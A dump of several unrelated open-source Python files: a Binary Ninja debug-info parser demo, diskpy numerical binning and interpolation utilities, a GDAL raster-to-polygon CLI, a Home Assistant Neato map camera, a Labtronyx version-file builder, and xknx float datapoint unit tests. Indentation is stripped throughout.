print(f"Availible parsers: {len(list(bn.debuginfo.DebugInfoParser))}")
for p in bn.debuginfo.DebugInfoParser:
if p == parser:
print(f" {bn.debuginfo.DebugInfoParser[p.name].name} (the one we just registered)")
else:
print(f" {bn.debuginfo.DebugInfoParser[p.name].name}")
bv = bn.open_view(filename, options={"analysis.experimental.parseDebugInfo": False})
if parser.is_valid_for_view(bv):
print("Parser is valid")
else:
print("Parser is NOT valid!")
quit()
print("")
for p in bn.debuginfo.DebugInfoParser.get_parsers_for_view(bv):
print(f"`{p.name}` is valid for `{bv}`")
print("")
debug_info = parser.parse_debug_info(bv)
print("\nEach of the following pairs of prints should be the same\n")
print("All types:")
for name, t in debug_info.types:
print(f" \"{name}\": `{t}`")
print("Types from parser:")
for name, t in debug_info.types_from_parser(parser.name):
print(f" \"{name}\": `{t}`")
print("")
print("All functions:")
for func in debug_info.functions:
print(f" {func}")
print("Functions from parser:")
for func in debug_info.functions_from_parser(parser.name):
print(f" {func}")
print("")
print("All data variables:")
for data_var in debug_info.data_variables:
print(f" {data_var}")
print("Data variables from parser:")
for data_var in debug_info.data_variables_from_parser(parser.name):
print(f" {data_var}")
print("Appling debug info!")
bv.apply_debug_info(debug_info)
bv.update_analysis_and_wait()
print("")
print("Types:")
for name, t in debug_info.types:
print(f" {bv.get_type_by_name(name)}")
print("")
print("Functions:")
for func in debug_info.functions:
print(f" {bv.get_function_at(func.address)}")
print("")
print("Data variables:")
for data_var in debug_info.data_variables:
print(f" {bv.get_data_var_at(data_var.address)}")
|
"""
Created on Thu Jul 16 14:26:07 2015
@author: ibackus
"""
import os
import numpy as np
import scipy.interpolate as interp
interp1d = interp.interp1d
import pynbody as pb
SimArray = pb.array.SimArray
from diskpy.utils import strip_units, match_units
def _loadcoeffs(fname):
"""
Loads hermite polynomial coefficients stored in fname and returns them
as a dictionary, where the keys are the degree of the polynomial and the
values are the coefficients
"""
# Load up the hermite spline (polynomial) coefficients
f =open(fname,'r')
coeffs_list = []
order_list = []
for line in f:
l = line.strip().split(',')
order_list.append(int(l[0]))
for n in range(len(l)):
l[n] = float(l[n].strip())
coeffs_list.append(np.array(l[1:],dtype='float'))
order = np.array(order_list)
coeffs = {}
for i in range(len(order)):
coeffs[order[i]] = coeffs_list[i]
return coeffs
_dir = os.path.dirname(os.path.realpath(__file__))
_coeffsfile = os.path.join(_dir, 'hermite_spline_coeffs.dat')
hermite_coeffs = _loadcoeffs(_coeffsfile)
def dA(redges, thetaedges):
"""
Calculates the area of bins in cylindrical coordinates as
.. math:: dA = r(\\Delta r) (\\Delta \\theta)
on a grid of r, theta values
Parameters
----------
redges, thetaedges : array like
1D arrays of the binedges in r, theta.
Returns
-------
dA : array
2D array of dA values over r, theta. dA[i,j] corresponds to r[i]
theta[j]
"""
dr = redges[1:] - redges[0:-1]
dtheta = thetaedges[1:] - thetaedges[0:-1]
r = (redges[1:] + redges[0:-1])/2.
rdr = r * dr
return np.dot(rdr[:, None], dtheta[None, :])
def setupbins(x, bins=10):
"""
Sets up bins for data x (similar to numpy.histogram). If bins is an
integer, the min/max are set to include all data
Parameters
----------
x : arraylike
Data to be binned
bins : int or array-like
Number of bins or binedges to use
Returns
-------
binedges : array
Bin edges
"""
# If bins is not iterable, it is the number of bins
if not hasattr(bins, '__iter__'):
dtype = x.dtype
if isinstance(dtype, int):
xmin = x.min() - 0.5
xmax = x.max() + 0.5
else:
eps = np.finfo(x.dtype).eps
xmin = x.min() * (1 - 2*eps)
xmax = x.max() * (1 + 2*eps)
binedges = np.linspace(xmin, xmax, bins + 1)
else:
# Bins is already binedges. do nothing
binedges = bins
return binedges
def resolvedbins(x, y, minbins=200, ftol=None):
"""
Generates a sub-view of x that allows y to be resolved up to ftol. Since
f will only be sampled at x, x should be very (overly) high resolution.
Parameters
----------
x : array or SimArray
initial bin positions to try. should be many more than required
y : array or SimArray
y(x), same shape as x. the function values to resolve
minbins : int
Minimum number of bins to return. IF the ftol is met but there are
not enough bins, ftol is decreased
ftol : SimArray, float
Function tolerance. Maximum difference between the interpolated,
subsampled y(x) and the full-ly resolved version
Returns
-------
x2 : array or SimArray
A subview of x that provides the required resolution
"""
# Initialize
if ftol is None:
ftol = y.max() * 1e-5
nx = len(x)
# Begin with bin edges at both ends
binind = [0, nx-1]
maxiter = int(1e5)
# Main loop
for i in range(maxiter):
# Linear spline interpolation
yspl = interp1d(x[binind], y[binind], kind='linear')
# Difference between interpolated and actual values (on the grid)
diff = abs(y - yspl(x))
# Find if any new bins need to be made
nbins = len(binind) - 1
newbins = []
for i in range(nbins):
# Get the indices of the current bin's edges
iLo = binind[i]
iHi = binind[i+1]
# If they are separated by more than one, we may need another bin
if (iHi-iLo) > 1:
# Find maximum error in the bin
err = diff[iLo+1:iHi].max()
# If the error exceeds the tolerance, add a new bin
if err > ftol:
newbin = int((iLo + iHi)/2)
newbins.append(newbin)
# Check if there are new bins
if len(newbins) == 0:
# No new bins - check if we have enough
if nbins < minbins:
# Decrease ftol if we don't have enough bins
ftol /= 1.5
else:
# we have enough bins, break
break
else:
# There are new bins, keep going
binind.extend(newbins)
binind.sort()
binind = np.array(binind)
return x[binind]
def bin2dsum(x, y, z, xbins=10, ybins=10):
"""
Bins x,y using bin2d and sums z in those bins
Parameters
----------
x, y, z: array-like
x, y, and z values. Bins are in x-y, z values are summed
xbins, ybins: int or array-like
(see bin2d) Number of bins or bin edges
Returns
-------
zbinned : array-like
2D array of z-values, summed in the bins. zbinned[i,j] gives the value
of z summed in xbin[i], ybin[j]
xedges, yedges : array
1D arrays of binedges in x,y
"""
ind, xedges, yedges = bin2d(x, y, xbins, ybins)
# If all the z values are the same (ie, all particles have same mass),
# the summing is much faster if we don't do the for loops below.
if np.all(z == z[0]):
# Sum is equivalent to number in each bin times z
N, dummy1, dummy2 = np.histogram2d(x, y, [xedges, yedges])
zbinned = z[[0]] * N
else:
# Perform sum
xind = ind[0]
yind = ind[1]
nx = len(xedges) - 1
ny = len(yedges) - 1
zbinned = np.zeros([nx, ny])
if pb.units.has_units(z):
zbinned = SimArray(zbinned, z.units)
for i in range(nx):
xmask = (xind == i)
for j in range(ny):
mask = xmask & (yind == j)
zbinned[i, j] = z[mask].sum()
return zbinned, xedges, yedges
def bin2d(x, y, xbins=10, ybins=10):
"""
2-dimensional binning of x, y
Works as a 2-D extension of numpy.digitize but also automatically sets-up
binedges
Parameters
----------
x, y : array-like
x, y values to bin according to
xbins, ybins : int OR list/array like
Either the number of bins or the binedges to use
Returns
-------
ind : list of arrays
The x,y bin indices each entry belongs to. ind[0][i] gives the x-bin
of the ith entry. ind[1][i] gives the y-bin of the ith entry
xedges, yedges: arrays
Bin edges used
"""
xedges = setupbins(x, xbins)
yedges = setupbins(y, ybins)
xind = np.digitize(x, xedges) - 1
yind = np.digitize(y, yedges) - 1
ind =[xind, yind]
return ind, xedges, yedges
def extrap1d(x,y):
"""
Calculates a linear interpolation of x and y and does a linear
extrapolation for points outside of x and y.
Uses scipy.interpolate.interp1d
"""
# Ignore nans
ind = (~np.isnan(x)) & (~np.isnan(y))
x = x[ind]
y = y[ind]
# calculate interpolation
yspline = interp.interp1d(x,y,kind='linear')
def fcn(x0):
if hasattr(x0,'__iter__'):
mask1 = x0 < x.min()
mask2 = x0 > x.max()
out = np.zeros(len(x0))
out[mask1] = y[0] + (x0[mask1] - x[0])*(y[1]-y[0])/(x[1]-x[0])
out[mask2] = y[-1] + (x0[mask2] - x[-1])*(y[-1] - y[-2])/(x[-1] - x[-2])
mask3 = (~mask1) & (~mask2)
out[mask3] = yspline(x0[mask3])
else:
if x0 < x.min():
out = y[0] + (x0 - x[0])*(y[1]-y[0])/(x[1]-x[0])
elif x0 > x.max():
out = y[-1] + (x0 - x[-1])*(y[-1] - y[-2])/(x[-1] - x[-2])
else:
out = yspline(x0)
# Don't return an array with one element
out = float(out)
return out
return fcn
def meshinterp(xedges, y, z, kind='linear', bounds_error=False, fill_value=0,
assume_sorted=True):
"""
Generates a 2D interpolating function for z defined on a non-uniform mesh
Handles units
Parameters
----------
xedges : array
1D array defining the x bin edges, monotonically increasing
y : array
2D array defining y values. shape (nx, ny), where nx is the number
of xedges and ny is the number of y-points at each x-bin
So, y[i, :] are the monotonically increasing y values at xedges[i]
z : array
2D array of z(x,y). shape (nx, ny) = y.shape
kind : str
(optional) Sets the kind of interpolation to perform
[see scipy.interpolate.interp1d]
bounds_error : bool
(optional) Flag to raise error if values outside of y are called
[see scipy.interpolate.interp1d]
fill_value : float
(optional) Sets the value to fill with if bounds_error = True
[see scipy.interpolate.interp1d]
assume_sorted : bool
[see scipy.interpolate.interp1d]
Returns
-------
meshspline(x, y): callable interpolation function
Function which can be called on x, y pairs to give the interpolated
value of z. Values outside of the range of y are set to fill_value.
x values outside the range of xedges are set to the boundary of xedges
"""
# Check shapes
if z.shape != y.shape:
raise ValueError, 'y and z must have same shape'
if len(xedges) != len(y):
raise ValueError, 'x and y must have same len'
# Handle units
pos = [xedges, y, z]
units = []
for a in pos:
if pb.units.has_units(a):
units.append(a.units)
else:
units.append(None)
xedges, y, z = strip_units(pos)
# Setup bin information
binsize = xedges[1:] - xedges[0:-1]
xmin = xedges[0]
xmax = xedges[-1]
nbins = len(xedges) - 1
# set up spliness
splines = []
for i in range(nbins+1):
# perform interpolation to make spline
splines.append(interp1d(y[i], z[i], kind=kind, \
bounds_error=bounds_error, fill_value=fill_value, \
assume_sorted=assume_sorted))
# Define the callable interplation function to return
def meshspline(x1, y1):
"""
Callable interpolation function, interoplates the value of z at
points (x1, y1)
Parameters
----------
x1, y1 : array
x and y points to evaluate z at. Must be the same shape. ie,
x1[i], y1[i] define a point (x, y).
If @x1 or @y1 have no units, they are assumed to have the units of
the nodes used to make the interpolator. Otherwise they are
converted to the proper units
Returns
-------
z(x1, y1) : array
z evaluated at @x1, @y1
"""
# Handle units
x1 = strip_units(match_units(x1, units[0])[0])
y1 = strip_units(match_units(y1, units[1])[0])
# Setup x and y points to estimate z at
x1 = np.asarray(x1).copy()
y1 = np.asarray(y1)
if len(x1.shape) < 1:
x1 = x1[None]
if len(y1.shape) < 1:
y1 = y1[None]
# Flatten arrays
shape = x1.shape
nElements = np.prod(shape)
x1 = np.reshape(x1, [nElements])
y1 = np.reshape(y1, [nElements])
# Deal with xs outside of boundaries
x1[x1 < xmin] = xmin
x1[x1 > xmax] = xmax
# Find bin indices
ind = np.digitize(x1, xedges) - 1
ind[ind < 0] = 0
ind[ind > nbins - 1] = nbins - 1
# Get bin info for every point
xlo = xedges[ind]
xhi = xedges[ind + 1]
dx = binsize[ind]
# Get weights for bins (distance from bin edges)
wlo = (xhi - x1)/dx
whi = (x1 - xlo)/dx
# Get function values at left and right xedges
flo = np.zeros(x1.shape)
fhi = np.zeros(x1.shape)
for i in range(nbins):
# Select everything in bin i
mask = (ind == i)
if np.any(mask):
# Retrieve function values
flo[mask] = splines[i](y1[mask])
fhi[mask] = splines[i+1](y1[mask])
# Take a weighted average of the function values at left and right
# bin edges
fout = wlo*flo + whi*fhi
# Unflatten fout:
fout = np.reshape(fout, shape)
return SimArray(fout, units[2])
return meshspline
def smoothstep(x,degree=5,rescale=False):
"""
Calculates a smooth step function y(x) evaluated at the data points x.
x should be a numpy array or float.
y(x) is a polynomial of order 'degree' (default is 5). degree must be an
odd number between 3 and 25 (inclusive). The higher the order, the
sharper the step is.
y(x) is defined by:
y(0) = 0
y(1) = 1
The first (degree - 1)/2 derivatives are 0 at y = 0,1
*** ARGUMENTS ***
* x * Points at which to evaluate the smoothstep
* degree * Degree of the smooth step. Must be odd number between 3 and 25
default = 5
* rescale * Rescale x to be between 0 and 1. Default = False. If True,
x MUST be an array (greater than length 1)
*** RETURNS ***
"""
coeffs = hermite_coeffs[degree]
# -----------------------------------------------------------
# Calculate the smooth step function y(x)
# -----------------------------------------------------------
n_coeffs = len(coeffs)
if rescale:
try:
x = (x - x.min())/(x.max() - x.min())
except:
raise RuntimeError,'Could not rescale x. Make sure x is an array'
if isinstance(x, (int, long, float, complex)):
# x is a number, handle accordingly
y = 0.0
if (x > 0) & (x < 1):
# If 0<x<1, calculate the smooth step
for n in range(n_coeffs):
y += coeffs[n] * x**(degree - n)
elif x <= 0:
y = 0.0
else:
y = 1.0
else:
# Assume x is a numpy array
y = np.zeros(x.shape)
ind = (x > 0) & (x < 1)
for n in range(n_coeffs):
y[ind] += coeffs[n] * x[ind]**(degree-n)
y[x >= 1] = 1
return y
def digitize_threshold(x, min_per_bin = 0, bins=10):
"""
Digitizes x according to bins, similar to numpy.digitize, but requires
that there are at least min_per_bin entries in each bin. Bins that do not
have enough entries are combined with adjacent bins until they meet the
requirement.
**ARGUMENTS**
x : array_like
Input array to be binned. Must be 1-dimensional
min_per_bin : int
Minimum number of entries per bin. Default = 0
bins : int or sequence of scalars, optional
[same as for np.histogram]
If bins is an int, it defines the number of equal-width bins in the
given range (10, by default). If bins is a sequence, it defines the
bin edges, including the rightmost edge, allowing for non-uniform bin
widths.
**RETURNS**
A tuple containing:
ind : array_like
Indices of the bin each element of x falls into, such that:
bin_edges[i] <= x[i] < bin_edges[i+1]
(See np.digitize, this uses the same convention)
bin_edges: array_like
The edges of the bins
"""
# Find number in each bin
N, bin_edges = np.histogram(x, bins)
if N.sum() < min_per_bin:
raise RuntimeError,'Not enough particles within the bin range'
n_bins = len(bin_edges) - 1
# Find out which binedges to delete
edge_mask = np.ones(len(bin_edges), dtype='bool')
for i in range(n_bins - 1):
# Work forwards
if N[i] < min_per_bin:
# Set mask to not use the right bin edge
edge_mask[i+1] = False
# Combine the particles in current and next bin
N[i] += N[i+1]
N[i+1] = N[i]
bin_mask = edge_mask[1:]
N = N[bin_mask]
bin_edges = bin_edges[edge_mask]
edge_mask = np.ones(len(bin_edges), dtype='bool')
n_bins = len(bin_edges) - 1
for i in range(n_bins-1, 0, -1):
# Work backwards
if N[i] < min_per_bin:
# Set mask to not use the left bin edge
edge_mask[i] = False
# Combine the particles in current and next bin
N[i] += N[i-1]
N[i-1] = N[i]
bin_edges = bin_edges[edge_mask]
ind = np.digitize(x, bin_edges)
return ind, bin_edges
def binned_mean(x, y, bins=10, nbins=None, binedges = None, weights=None,\
weighted_bins=False, ret_bin_edges=False):
"""
Bins y according to x and takes the average for each bin.
bins can either be an integer (the number of bins to use) or an array of
binedges. bins will be overridden by nbins or binedges
Optionally (for compatibility reasons) if binedges is specified, the
x-bins are defined by binedges. Otherwise the x-bins are determined by
nbins
If weights = None, equal weights are assumed for the average, otherwise
weights for each data point should be specified
y_err (error in y) is calculated as the standard deviation in y for each
bin, divided by sqrt(N), where N is the number of counts in each bin
IF weighted_bins is True, the bin centers are calculated as a center of
mass
NaNs are ignored for the input. Empty bins are returned with nans
RETURNS a tuple of (bin_centers, y_mean, y_err) if ret_bin_edges=False
else, Returns (bin_edges, y_mean, y_err)
"""
if (isinstance(bins, int)) and (nbins is None):
nbins = bins
elif (hasattr(bins, '__iter__')) and (binedges is None):
binedges = bins
if binedges is not None:
nbins = len(binedges) - 1
else:
binedges = np.linspace(x.min(), (1 + np.spacing(2))*x.max(), nbins + 1)
if weights is None:
weights = np.ones(x.shape)
weights = strip_units(weights)
# Pre-factor for weighted STD:
A = 1/(1 - (weights**2).sum())
# Initialize
y_mean = np.zeros(nbins)
y_std = np.zeros(nbins)
# Find the index bins for each data point
ind = np.digitize(x, binedges) - 1
# Ignore nans
nan_ind = np.isnan(y)
N = np.histogram(x, binedges)[0]
# Initialize bin_centers (try to retain units)
bin_centers = 0.0*binedges[1:]
for i in range(nbins):
#Indices to use
mask = (ind==i) & (~nan_ind)
# Set up the weighting
w = weights[mask].copy()
w /= w.sum()
A = 1/(1 - (w**2).sum())
#y_mean[i] = np.nanmean(y[mask])
y_mean[i] = (w * y[mask]).sum()
var = A*(w*(y[mask] - y_mean[i])**2).sum()
y_std[i] = np.sqrt(var)
#y_std[i] = np.std(y[use_ind])
if weighted_bins:
# Center of mass of x positions
bin_centers[i] = (w*x[mask]).sum()
y_mean = match_units(y_mean, y)[0]
y_err = y_std/np.sqrt(N)
y_err = match_units(y_err, y)[0]
y_mean[N==0] = np.nan
y_err[N==0] = np.nan
if not weighted_bins:
bin_centers = (binedges[0:-1] + binedges[1:])/2.0
binedges = match_units(binedges, x)[0]
bin_centers = match_units(bin_centers, x)[0]
else:
bin_centers[N==0] = np.nan
if ret_bin_edges:
return binedges, y_mean, y_err
else:
return bin_centers, y_mean, y_err
def kepler_pos(pos, vel, t, Mstar, order=10):
"""
Estimate position at future time t assuming an elliptical keplerian orbit
"""
G = SimArray(1.0, 'G')
mu = G*Mstar
r = np.sqrt((pos**2).sum())
v = np.sqrt((vel**2).sum())
# Calculate semi-major axis
a = mu*r/(2*mu - v*v*r)
a.convert_units(r.units)
# Calculate eccentricity vector
ecc = (v*v)*pos/mu - ((pos*vel).sum())*vel/mu - pos/r
ecc.convert_units('1')
# Calculate eccentricity
e = float(np.sqrt((ecc**2).sum()))
# Calculate initial eccentric anomaly
# x1 = a*e^2 + r.e
x1 = a*e**2 + (pos*ecc).sum()
# y1 = |r x e| * sign(r.v)
y1 = np.sqrt((np.cross(pos, ecc)**2).sum())
y1 *= (pos*vel).sum()/abs((pos*vel).sum())
E0 = np.arctan2(y1,x1)
# Calculate mean anomaly
M0 = E0 - e*np.sin(E0)
a3 = np.power(a,3)
M = (np.sqrt(mu/a3)*t).in_units('1') + M0
# Calculate eccentric anomaly
E = E0
for i in range(order):
E = M + e*np.sin(E)
# Calculate (x1, y1) (relative to center of ellipse, not focus)
x1 = (2*a - r) * np.cos(E)
y1 = (2*a - r) * np.sin(E)
# Transform to original coordinates
x1hat = ecc/np.sqrt((ecc**2).sum())
y1hat = np.cross(np.cross(pos, vel), ecc)
y1hat /= np.sqrt((y1hat**2).sum())
pos_f = (x1 - a*e)*x1hat + y1*y1hat
return pos_f
|
import sys
from os.path import basename
from osgeo import ogr; ogr.UseExceptions() # pylint: disable=multiple-statements
from osgeo import osr; ogr.UseExceptions() # pylint: disable=multiple-statements
from osgeo import gdal; gdal.UseExceptions() # pylint: disable=multiple-statements
from img import ImageFileReader
from img.cli import error
from img_geom import OUTPUT_FORMATS, setSR, dumpGeom
from img_vectorize import vectorize
def usage():
""" Print simple usage help. """
def _gen_():
yield "Extract polygon outlines of single colour raster patches."
yield "The non-simplified geometry is dumped to standard output."
yield "By default the output is dumped in the WKB format."""
yield (
"USAGE: %s <input image> <data-value> [%s] [AND] [EQL]" %
(basename(sys.argv[0]), "|".join(OUTPUT_FORMATS))
)
for line in _gen_():
print >>sys.stderr, line
FILTERS = {
(True, True): lambda v: VALUE & v == VALUE,
(False, True): lambda v: VALUE & v != 0,
(True, False): lambda v: v == VALUE,
}
if __name__ == "__main__":
ALLOWED_DTYPES = ('uint8', 'uint16', 'uint32', 'int8', 'int16', 'int32')
OP_AND = False
OP_EQL = False
FORMAT = "WKB"
try:
INPUT = sys.argv[1]
VALUE = int(sys.argv[2])
for arg in sys.argv[3:]:
if arg in OUTPUT_FORMATS:
FORMAT = arg # output format
elif arg == "AND":
OP_AND = True
elif arg == "EQL":
OP_EQL = True
except IndexError:
error("Not enough input arguments!")
usage()
sys.exit(1)
if not OP_AND and not OP_EQL:
OP_EQL = True
# open the mask image
IMG_MASK = ImageFileReader(INPUT)
# check mask properties
if IMG_MASK.size.z > 1:
error("Multi-band images are not supported!")
sys.exit(1)
if IMG_MASK.dtype not in ALLOWED_DTYPES:
error("Unsupported image data type '%s'!" % IMG_MASK.dtype)
sys.exit(1)
GEOCODING = IMG_MASK.geocoding
if 'geotrn' not in GEOCODING:
error("The image must be rectified and geocoded!")
sys.exit(1)
# vectorize geometry, fix the spatial reference and print the output
sys.stdout.write(dumpGeom(setSR(
vectorize(IMG_MASK[0], FILTERS[(OP_EQL, OP_AND)]),
osr.SpatialReference(GEOCODING['proj'])
), FORMAT))
|
"""Support for loading picture from Neato."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
from pybotvac.exceptions import NeatoRobotException
from pybotvac.robot import Robot
from urllib3.response import HTTPResponse
from homeassistant.components.camera import Camera
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
from .hub import NeatoHub
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
ATTR_GENERATED_AT = "generated_at"
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up Neato camera with config entry."""
dev = []
neato: NeatoHub = hass.data[NEATO_LOGIN]
mapdata: dict[str, Any] | None = hass.data.get(NEATO_MAP_DATA)
for robot in hass.data[NEATO_ROBOTS]:
if "maps" in robot.traits:
dev.append(NeatoCleaningMap(neato, robot, mapdata))
if not dev:
return
_LOGGER.debug("Adding robots for cleaning maps %s", dev)
async_add_entities(dev, True)
class NeatoCleaningMap(Camera):
"""Neato cleaning map for last clean."""
def __init__(
self, neato: NeatoHub, robot: Robot, mapdata: dict[str, Any] | None
) -> None:
"""Initialize Neato cleaning map."""
super().__init__()
self.robot = robot
self.neato = neato
self._mapdata = mapdata
self._available = neato is not None
self._robot_name = f"{self.robot.name} Cleaning Map"
self._robot_serial: str = self.robot.serial
self._generated_at: str | None = None
self._image_url: str | None = None
self._image: bytes | None = None
def camera_image(
self, width: int | None = None, height: int | None = None
) -> bytes | None:
"""Return image response."""
self.update()
return self._image
def update(self) -> None:
"""Check the contents of the map list."""
_LOGGER.debug("Running camera update for '%s'", self.entity_id)
try:
self.neato.update_robots()
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error(
"Neato camera connection error for '%s': %s", self.entity_id, ex
)
self._image = None
self._image_url = None
self._available = False
return
if self._mapdata:
map_data: dict[str, Any] = self._mapdata[self._robot_serial]["maps"][0]
if (image_url := map_data["url"]) == self._image_url:
_LOGGER.debug(
"The map image_url for '%s' is the same as old", self.entity_id
)
return
try:
image: HTTPResponse = self.neato.download_map(image_url)
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error(
"Neato camera connection error for '%s': %s", self.entity_id, ex
)
self._image = None
self._image_url = None
self._available = False
return
self._image = image.read()
self._image_url = image_url
self._generated_at = map_data.get("generated_at")
self._available = True
@property
def name(self) -> str:
"""Return the name of this camera."""
return self._robot_name
@property
def unique_id(self) -> str:
"""Return unique ID."""
return self._robot_serial
@property
def available(self) -> bool:
"""Return if the robot is available."""
return self._available
@property
def device_info(self) -> DeviceInfo:
"""Device info for neato robot."""
return DeviceInfo(identifiers={(NEATO_DOMAIN, self._robot_serial)})
@property
def extra_state_attributes(self) -> dict[str, Any]:
"""Return the state attributes of the vacuum cleaner."""
data: dict[str, Any] = {}
if self._generated_at is not None:
data[ATTR_GENERATED_AT] = self._generated_at
return data
|
"""
Build helper functions for Labtronyx
"""
__author__ = 'kkennedy'
VER_MAJOR = 1
VER_MINOR = 0
VER_PATCH = 0
RELEASE = False
REL_TYPE = 'dev' # Development Release
import os, time
rootPath = os.path.dirname(os.path.realpath(os.path.join(__file__, os.curdir))) # Resolves symbolic links
def generate_ver(filename='labtronyx/version.py'):
print "Generating version file: %s" % filename
# Get Git Revision
try:
import subprocess
GIT_REVISION = subprocess.check_output(['git', 'rev-parse', 'HEAD']).strip()
except:
GIT_REVISION = ''
# Generate version string
VERSION = '%d.%d.%d' % (VER_MAJOR, VER_MINOR, VER_PATCH)
BUILD_DATE = time.strftime("%y%m%d")
if not RELEASE:
# Pre-release build
if GIT_REVISION != '':
FULL_VERSION = '%s-%s+commit.%s' % (VERSION, REL_TYPE, GIT_REVISION[:7])
else:
FULL_VERSION = '%s-%s+build.%s' % (VERSION, REL_TYPE, BUILD_DATE)
else:
# Release build
FULL_VERSION = VERSION
# Generate version file
ver_py = """# AUTOGENERATED DURING BUILD
ver_sem = '{version}'
ver_full = '{full_version}'
build_date = '{build}'
git_revision = '{git_revision}'
"""
with open(os.path.join(rootPath, filename), 'w') as f:
f.write(ver_py.format(version=VERSION, full_version=FULL_VERSION,
build=BUILD_DATE, git_revision=GIT_REVISION))
return VERSION, FULL_VERSION
def build_all():
print "Running build..."
try:
generate_ver()
print "Build completed!"
except:
print "Build failed!"
raise
if __name__ == '__main__':
build_all()
|
import scarlett
from scarlett.constants import *
class ScarlettBasics(object):
def __init__(self, brain, **kwargs):
self.brain = brain
|
"""Unit test for KNX 2 and 4 byte float objects."""
import math
import struct
from unittest.mock import patch
import pytest
from xknx.dpt import (
DPT2ByteFloat,
DPT4ByteFloat,
DPTElectricCurrent,
DPTElectricPotential,
DPTEnthalpy,
DPTFrequency,
DPTHumidity,
DPTLux,
DPTPartsPerMillion,
DPTPhaseAngleDeg,
DPTPower,
DPTTemperature,
DPTVoltage,
)
from xknx.exceptions import ConversionError
class TestDPTFloat:
"""Test class for KNX 2 & 4 byte/octet float object."""
# ####################################################################
# DPT2ByteFloat
#
def test_value_from_documentation(self):
"""Test parsing and streaming of DPT2ByteFloat -30.00. Example from the internet[tm]."""
assert DPT2ByteFloat.to_knx(-30.00) == (0x8A, 0x24)
assert DPT2ByteFloat.from_knx((0x8A, 0x24)) == -30.00
def test_value_taken_from_live_thermostat(self):
"""Test parsing and streaming of DPT2ByteFloat 19.96."""
assert DPT2ByteFloat.to_knx(16.96) == (0x06, 0xA0)
assert DPT2ByteFloat.from_knx((0x06, 0xA0)) == 16.96
def test_zero_value(self):
"""Test parsing and streaming of DPT2ByteFloat zero value."""
assert DPT2ByteFloat.to_knx(0.00) == (0x00, 0x00)
assert DPT2ByteFloat.from_knx((0x00, 0x00)) == 0.00
def test_room_temperature(self):
"""Test parsing and streaming of DPT2ByteFloat 21.00. Room temperature."""
assert DPT2ByteFloat.to_knx(21.00) == (0x0C, 0x1A)
assert DPT2ByteFloat.from_knx((0x0C, 0x1A)) == 21.00
def test_high_temperature(self):
"""Test parsing and streaming of DPT2ByteFloat 500.00, 499.84, 500.16. Testing rounding issues."""
assert DPT2ByteFloat.to_knx(500.00) == (0x2E, 0x1A)
assert round(abs(DPT2ByteFloat.from_knx((0x2E, 0x1A)) - 499.84), 7) == 0
assert round(abs(DPT2ByteFloat.from_knx((0x2E, 0x1B)) - 500.16), 7) == 0
assert DPT2ByteFloat.to_knx(499.84) == (0x2E, 0x1A)
assert DPT2ByteFloat.to_knx(500.16) == (0x2E, 0x1B)
def test_minor_negative_temperature(self):
"""Test parsing and streaming of DPT2ByteFloat -10.00. Testing negative values."""
assert DPT2ByteFloat.to_knx(-10.00) == (0x84, 0x18)
assert DPT2ByteFloat.from_knx((0x84, 0x18)) == -10.00
def test_very_cold_temperature(self):
"""
Test parsing and streaming of DPT2ByteFloat -1000.00,-999.68, -1000.32.
Testing rounding issues of negative values.
"""
assert DPT2ByteFloat.to_knx(-1000.00) == (0xB1, 0xE6)
assert DPT2ByteFloat.from_knx((0xB1, 0xE6)) == -999.68
assert DPT2ByteFloat.from_knx((0xB1, 0xE5)) == -1000.32
assert DPT2ByteFloat.to_knx(-999.68) == (0xB1, 0xE6)
assert DPT2ByteFloat.to_knx(-1000.32) == (0xB1, 0xE5)
def test_max(self):
"""Test parsing and streaming of DPT2ByteFloat with maximum value."""
assert DPT2ByteFloat.to_knx(DPT2ByteFloat.value_max) == (0x7F, 0xFF)
assert DPT2ByteFloat.from_knx((0x7F, 0xFF)) == DPT2ByteFloat.value_max
def test_min(self):
"""Test parsing and streaming of DPT2ByteFloat with minimum value."""
assert DPT2ByteFloat.to_knx(DPT2ByteFloat.value_min) == (0xF8, 0x00)
assert DPT2ByteFloat.from_knx((0xF8, 0x00)) == DPT2ByteFloat.value_min
def test_close_to_max(self):
"""Test parsing and streaming of DPT2ByteFloat with maximum value -1."""
assert DPT2ByteFloat.to_knx(670433.28) == (0x7F, 0xFE)
assert DPT2ByteFloat.from_knx((0x7F, 0xFE)) == 670433.28
def test_close_to_min(self):
"""Test parsing and streaming of DPT2ByteFloat with minimum value +1."""
assert DPT2ByteFloat.to_knx(-670760.96) == (0xF8, 0x01)
assert DPT2ByteFloat.from_knx((0xF8, 0x01)) == -670760.96
def test_to_knx_min_exceeded(self):
"""Test parsing of DPT2ByteFloat with wrong value (underflow)."""
with pytest.raises(ConversionError):
DPT2ByteFloat.to_knx(DPT2ByteFloat.value_min - 1)
def test_to_knx_max_exceeded(self):
"""Test parsing of DPT2ByteFloat with wrong value (overflow)."""
with pytest.raises(ConversionError):
DPT2ByteFloat.to_knx(DPT2ByteFloat.value_max + 1)
def test_to_knx_wrong_parameter(self):
"""Test parsing of DPT2ByteFloat with wrong value (string)."""
with pytest.raises(ConversionError):
DPT2ByteFloat.to_knx("fnord")
def test_from_knx_wrong_parameter(self):
"""Test parsing of DPT2ByteFloat with wrong value (wrong number of bytes)."""
with pytest.raises(ConversionError):
DPT2ByteFloat.from_knx((0xF8, 0x01, 0x23))
def test_from_knx_wrong_parameter2(self):
"""Test parsing of DPT2ByteFloat with wrong value (second parameter is a string)."""
with pytest.raises(ConversionError):
DPT2ByteFloat.from_knx((0xF8, "0x23"))
#
# DPTTemperature
#
def test_temperature_settings(self):
"""Test attributes of DPTTemperature."""
assert DPTTemperature.value_min == -273
assert DPTTemperature.value_max == 670760
assert DPTTemperature.unit == "°C"
assert DPTTemperature.resolution == 0.01
def test_temperature_assert_min_exceeded(self):
"""Testing parsing of DPTTemperature with wrong value."""
with pytest.raises(ConversionError):
DPTTemperature.to_knx(-274)
